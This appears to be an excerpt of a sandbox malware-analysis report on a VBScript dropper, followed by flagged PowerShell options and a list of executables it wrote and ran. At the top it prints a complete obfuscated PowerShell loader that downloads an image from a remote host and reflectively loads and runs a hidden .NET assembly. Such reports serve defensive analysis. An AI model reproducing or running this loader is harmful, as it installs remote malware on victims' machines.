vhPbYLFQAuOvhPbYLRQB1AuOvhPbYLE4AuOvhPbYLRAuOvhPbYLBrAuOvhPbYLHYAuOvhPbYLTAuOvhPbYLB6AuOvhPbYLHAuOvhPbYLAuOvhPbYLdwBkAuOvhPbYLEgAuOvhPbYLUgBvAuOvhPbYLCcAuOvhPbYLIAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLJwBkAuOvhPbYLGYAuOvhPbYLZAuOvhPbYLBmAuOvhPbYLGQAuOvhPbYLJwAuOvhPbYLgAuOvhPbYLCwAuOvhPbYLIAuOvhPbYLAuOvhPbYLnAuOvhPbYLGQAuOvhPbYLZgBkAuOvhPbYLGYAuOvhPbYLJwAuOvhPbYLgAuOvhPbYLCwAuOvhPbYLIAuOvhPbYLAuOvhPbYLnAuOvhPbYLGQAuOvhPbYLZgBkAuOvhPbYLGYAuOvhPbYLJwAuOvhPbYLgAuOvhPbYLCwAuOvhPbYLIAuOvhPbYLAuOvhPbYLnAuOvhPbYLGQAuOvhPbYLYQBkAuOvhPbYLHMAuOvhPbYLYQAuOvhPbYLnAuOvhPbYLCAuOvhPbYLAuOvhPbYLLAuOvhPbYLAuOvhPbYLgAuOvhPbYLCcAuOvhPbYLZAuOvhPbYLBlAuOvhPbYLCcAuOvhPbYLIAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLJwBjAuOvhPbYLHUAuOvhPbYLJwAuOvhPbYLpAuOvhPbYLCkAuOvhPbYL';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('AuOvhPbYL','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process	wscript.exe	martian_process	powershell -command "$Codigo = 'JAuOvhPbYLBpAuOvhPbYLG0AuOvhPbYLYQBnAuOvhPbYLGUAuOvhPbYLVQByAuOvhPbYLGwAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJwBoAuOvhPbYLHQAuOvhPbYLdAuOvhPbYLBwAuOvhPbYLHMAuOvhPbYLOgAuOvhPbYLvAuOvhPbYLC8AuOvhPbYLdwBhAuOvhPbYLGwAuOvhPbYLbAuOvhPbYLBwAuOvhPbYLGEAuOvhPbYLcAuOvhPbYLBlAuOvhPbYLHIAuOvhPbYLYwBhAuOvhPbYLHYAuOvhPbYLZQAuOvhPbYLuAuOvhPbYLGMAuOvhPbYLbwBtAuOvhPbYLC8AuOvhPbYLdQB3AuOvhPbYLHAuOvhPbYLAuOvhPbYLLwB1AuOvhPbYLHcAuOvhPbYLcAuOvhPbYLAuOvhPbYL0AuOvhPbYLDAuOvhPbYLAuOvhPbYLOAuOvhPbYLAuOvhPbYLyAuOvhPbYLDkAuOvhPbYLOAuOvhPbYLAuOvhPbYL5AuOvhPbYLC4AuOvhPbYLcAuOvhPbYLBuAuOvhPbYLGcAuOvhPbYLJwAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLdwBlAuOvhPbYLGIAuOvhPbYLQwBsAuOvhPbYLGkAuOvhPbYLZQBuAuOvhPbYLHQAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLTgBlAuOvhPbYLHcAuOvhPbYLLQBPAuOvhPbYLGIAuOvhPbYLagBlAuOvhPbYLGMAuOvhPbYLdAuOvhPbYLAuOvhPbYLgAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLTgBlAuOvhPbYLHQAuOvhPbYLLgBXAuOvhPbYLGUAuOvhPbYLYgBDAuOvhPbYLGwAuOvhPbYLaQBlAuOvhPbYLG4AuOvhPbYLdAuOvhPbYLAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLaQBtAuOvhPbYLGEAuOvhPbYLZwBlAuOvhPbYLEIAuOvhPbYLeQB0AuOvhPbYLGUAuOvhPbYLcwAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLAuOvhPbYLkAuOvhPbYLHcAuOvhPbYLZQBiAuOvhPbYLEMAuOvhPbYLbAuOvhPbYLBpAuOvhPbYLGUAuOvhPbYLbgB0AuOvhPbYLC4AuOvhPbYLRAuOvhPbYLBvAuOvhPbYLHcAuOvhPbYLbgBsAuOvhPbYLG8AuOvhPbYLYQBkAuOvhPbYLEQAuOvhPbYLYQB0AuOvhPbYLGEAuOvhPbYLKAuOvhPbYLAuOvhPbYLkAuOvhPbYLGkAuOvhPbYLbQBhAuOvhPbYLGcAuOvhPbYLZQBVAuOvhPbYLHIAuOvhPbYLbAuOvhPbYLAuOvhPbYLpAuOvhPbYLDsAuOvhPbYLJAuOvhPbYLBpAuOvhPbYLG0AuOvhPbYLYQBnAuOvhPbYLGUAuOvhPbYLVAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLdAuOvhPbYLAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLBbAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLVAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLdAuOvhPbYLAuOvhPbYLuAuOvhPbYLEUAuOvhPbYLbgBjAuOvhPbYLG8AuOvhPbYLZAuOvhPbYLBpAuOvhPbYLG4AuOvhPbYLZwBdAuOvhPbYLDoAuOvhPbYLOgBVAuOvhPbYLFQAuOvhPbYLRgAuOvhPbYL4AuOvhPbYLC4AuOvhPbYLRwBlAuOvhPbYLHQAuOvhPbYLUwB0AuOvhPbYLHIAuOvhPbYLaQBuAuOvhPbYLGcAuOvhPbYLKAuOvhPbYLAuOvhPbYLkAuOvhPbYLGkAuOvhPbYLbQBhAuOvhPbYLGcAuOvhPbYLZQBCAuOvhPbYLHkAuOvhPbYLdAuOvhPbYLBlAuOvhPbYLHMAuOvhPbYLKQAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEYAuOvhPbYLbAuOvhPbYLBhAuOvhPbYLGcAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJwAuOvhPbYL8AuOvhPbYLDwAuOvhPbYLQgBBAuOvhPbYLFMAuOvhPbYLRQAuOvhPbYL2AuOvhPbYLDQAuOvhPbYLXwBTAuOvhPbYLFQAuOvhPbYLQQBSAuOvhPbYLFQAuOvhPbYLPgAuOvhPbYL+AuOvhPbYLCcAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLGUAuOvhPbYLbgBkAuOvhPbYLEYAuOvhPbYLbAuOvhPbYLBhAuOvhPbYLGcAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJwAuOvhPbYL8AuOvhPbYLDwAuOvhPbYLQgBBAuOvhPbYLFMAuOvhPbYLRQAuOvhPbYL2AuOvhPbYLDQAuOvhPbYLXwBFAuOvhPbYLE4AuOvhPbYLRAuOvhPbYLAuOvhPbYL+AuOvhPbYLD4AuOvhPbYLJwAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLAuOvhPbYLkAuOvhPbYLGkAuOvhPbYLbQBhAuOvhPbYLGcAuOvhPbYLZQBUAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLB0AuOvhPbYLC4AuOvhPbYLSQBuAuOvhPbYLGQAuOvhPbYLZQB4AuOvhPbYLE8AuOvhPbYLZgAuOvhPbYLoAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEYAuOvhPbYLbAuOvhPbYLBhAuOvhPbYLGcAuOvhPbYLKQAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLZQBuAuOvhPbYLGQAuOvhPbYLSQBuAuOvhPbYLGQAuOvhPbYLZQB4AuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLaQBtAuOvhPbYLGEAuOvhPbYLZwBlAuOvhPbYLFQAuOvhPbYLZQB4AuOvhPbYLHQAuOvhPbYLLgBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLTwBmAuOvhPbYLCgAuOvhPbYLJAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBGAuOvhPbYLGwAuOvhPbYLYQBnAuOvhPbYLCkAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLHMAuOvhPbYLdAuOvhPbYLBhAuOvhPbYLHIAuOvhPbYLdAuOvhPbYLBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLGcAuOvhPbYLZQAuOvhPbYLgAuOvhPbYLDAuOvhPbYLAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLCAuOvhPbYLAuOvhPbYLJAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLGcAuOvhPbYLdAuOvhPbYLAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYLgAuOvhPbYLCsAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEYAuOvhPbYLbAuOvhPbYLBhAuOvhPbYLGcAuOvhPbYLLgBMAuOvhPbYLGUAuOvhPbYLbgBnAuOvhPbYLHQAuOvhPbYLaAuOvhPbYLAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLYgBhAuOvhPbYLHMAuOvhPbYLZQAuOvhPbYL2AuOvhPbYLDQAuOvhPbYLTAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZwB0AuOvhPbYLGgAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLCAuOvhPbYLAuOvhPbYLJAuOvhPbYLBzAuOvhPbYLHQAuOvhPbYLYQByAuOvhPbYLHQAuOvhPbYLSQBuAuOvhPbYLGQAuOvhPbYLZQB4AuOvhPbYLDsAuOvhPbYLJAuOvhPbYLBiAuOvhPbYLGEAuOvhPbYLcwBlAuOvhPbYLDYAuOvhPbYLNAuOvhPbYLBDAuOvhPbYLG8AuOvhPbYLbQBtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLaQBtAuOvhPbYLGEAuOvhPbYLZwBlAuOvhPbYLFQAuOvhPbYLZQB4AuOvhPbYLHQAuOvhPbYLLgBTAuOvhPbYLHUAuOvhPbYLYgBzAuOvhPbYLHQAuOvhPbYLcgBpAuOvhPbYLG4AuOvhPbYLZwAuOvhPbYLoAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLJAuOvhPbYLBiAuOvhPbYLGEAuOvhPbYLcwBlAuOvhPbYLDYAuOvhPbYLNAuOvhPbYLBMAuOvhPbYLGUAuOvhPbYLbgBnAuOvhPbYLHQAuOvhPbYLaAuOvhPbYLAuOvhPbYLpAuOvhPbYLDsAuOvhPbYLJAuOvhPbYLBjAuOvhPbYLG8AuOvhPbYLbQBtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLEIAuOvhPbYLeQB0AuOvhPbYLGUAuOvhPbYLcwAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLBbAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLQwBvAuOvhPbYLG4AuOvhPbYLdgBlAuOvhPbYLHIAuOvhPbYLdAuOvhPbYLBdAuOvhPbYLDoAuOvhPbYLOgBGAuOvhPbYLHIAuOvhPbYLbwBtAuOvhPbYLEIAuOvhPbYLYQBzAuOvhPbYLGUAuOvhPbYLNgAuOvhPbYL0AuOvhPbYLFMAuOvhPbYLdAuOvhPbYLByAuOvhPbYLGkAuOvhPbYLbgBnAuOvhPbYLCgAuOvhPbYLJAuOvhPbYLBiAuOvhPbYLGEAuOvhPbYLcwBlAuOvhPbYLDYAuOvhPbYLNAuOvhPbYLBDAuOvhPbYLG8AuOvhPbYLbQBtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLCkAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLGwAuOvhPbYLbwBhAuOvhPbYLGQAuOvhPbYLZQBkAuOvhPbYLEEAuOvhPbYLcwBzAuOvhPbYLGUAuOvhPbYLbQBiAuOvhPbYLGwAuOvhPbYLeQAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLBbAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLUgBlAuOvhPbYLGYAuOvhPbYLbAuOvhPbYLBlAuOvhPbYLGMAuOvhPbYLdAuOvhPbYLBpAuOvhPbYLG8AuOvhPbYLbgAuOvhPbYLuAuOvhPbYLEEAuOvhPbYLcwBzAuOvhPbYLGUAuOvhPbYLbQBiAuOvhPbYLGwAuOvhPbYLeQBdAuOvhPbYLDoAuOvhPbYLOgBMAuOvhPbYLG8AuOvhPbYLYQBkAuOvhPbYLCgAuOvhPbYLJAuOvhPbYLBjAuOvhPbYLG8AuOvhPbYLbQBtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLEIAuOvhPbYLeQB0AuOvhPbYLGUAuOvhPbYLcwAuOvhPbYLpAuOvhPbYLDsAuOvhPbYLJAuOvhPbYLB0AuOvhPbYLHkAuOvhPbYLcAuOvhPbYLBlAuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLbAuOvhPbYLBvAuOvhPbYLGEAuOvhPbYLZAuOvhPbYLBlAuOvhPbYLGQAuOvhPbYLQQBzAuOvhPbYLHMAuOvhPbYLZQBtAuOvhPbYLGIAuOvhPbYLbAuOvhPbYLB5AuOvhPbYLC4AuOvhPbYLRwBlAuOvhPbYLHQAuOvhPbYLVAuOvhPbYLB5AuOvhPbYLHAuOvhPbYLAuOvhPbYLZQAuOvhPbYLoAuOvhPbYLCcAuOvhPbYLRgBpAuOvhPbYLGIAuOvhPbYLZQByAuOvhPbYLC4AuOvhPbYLSAuOvhPbYLBvAuOvhPbYLG0AuOvhPbYLZQAuOvhPbYLnAuOvhPbYLCkAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLG0AuOvhPbYLZQB0AuOvhPbYLGgAuOvhPbYLbwBkAuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLdAuOvhPbYLB5AuOvhPbYLHAuOvhPbYLAuOvhPbYLZQAuOvhPbYLuAuOvhPbYLEcAuOvhPbYLZQB0AuOvhPbYLE0AuOvhPbYLZQB0AuOvhPbYLGgAuOvhPbYLbwBkAuOvhPbYLCgAuOvhPbYLJwBWAuOvhPbYLEEAuOvhPbYLSQAuOvhPbYLnAuOvhPbYLCkAuOvhPbYLLgBJAuOvhPbYLG4AuOvhPbYLdgBvAuOvhPbYLGsAuOvhPbYLZQAuOvhPbYLoAuOvhPbYLCQAuOvhPbYLbgB1AuOvhPbYLGwAuOvhPbYLbAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLWwBvAuOvhPbYLGIAuOvhPbYLagBlAuOvhPbYLGMAuOvhPbYLdAuOvhPbYLBbAuOvhPbYLF0AuOvhPbYLXQAuOvhPbYLgAuOvhPbYLCgAuOvhPbYLJwBkAuOvhPbYLEgAuOvhPbYLaAuOvhPbYLAuOvhPbYLwAuOvhPbYLEwAuOvhPbYLbQBkAuOvhPbYLHUAuOvhPbYLYQBXAuOvhPbYLDUAuOvhPbYLcAuOvhPbYLBiAuOvhPbYLG0AuOvhPbYLbAuOvhPbYLBuAuOvhPbYLFoAuOvhPbYLVwBKAuOvhPbYLDMAuOvhPbYLWgBXAuOvhPbYLDQAuOvhPbYLdgBOAuOvhPbYLGoAuOvhPbYLTQB5AuOvhPbYLEwAuOvhPbYLagBNAuOvhPbYLDEAuOvhPbYLTQBpAuOvhPbYLDQAuOvhPbYLMgBOAuOvhPbYLFQAuOvhPbYLRQB1AuOvhPbYLE4AuOvhPbYLRAuOvhPbYLBrAuOvhPbYLHYAuOvhPbYLTAuOvhPbYLB6AuOvhPbYLHAuOvhPbYLAuOvhPbYLdwBkAuOvhPbYLEgAuOvhPbYLUgBvAuOvhPbYLCcAuOvhPbYLIAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLJwBkAuOvhPbYLGYAuOvhPbYLZAuOvhPbYLBmAuOvhPbYLGQAuOvhPbYLJwAuOvhPbYLgAuOvhPbYLCwAuOvhPbYLIAuOvhPbYLAuOvhPbYLnAuOvhPbYLGQAuOvhPbYLZgBkAuOvhPbYLGYAuOvhPbYLJwAuOvhPbYLgAuOvhPbYLCwAuOvhPbYLIAuOvhPbYLAuOvhPbYLnAuOvhPbYLGQAuOvhPbYLZgBkAuOvhPbYLGYAuOvhPbYLJwAuOvhPbYLgAuOvhPbYLCwAuOvhPbYLIAuOvhPbYLAuOvhPbYLnAuOvhPbYLGQAuOvhPbYLYQBkAuOvhPbYLHMAuOvhPbYLYQAuOvhPbYLnAuOvhPbYLCAuOvhPbYLAuOvhPbYLLAuOvhPbYLAuOvhPbYLgAuOvhPbYLCcAuOvhPbYLZAuOvhPbYLBlAuOvhPbYLCcAuOvhPbYLIAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLJwBjAuOvhPbYLHUAuOvhPbYLJwAuOvhPbYLpAuOvhPbYLCkAuOvhPbYL';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('AuOvhPbYL','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

Creates a suspicious Powershell process (9 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

westartagain.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All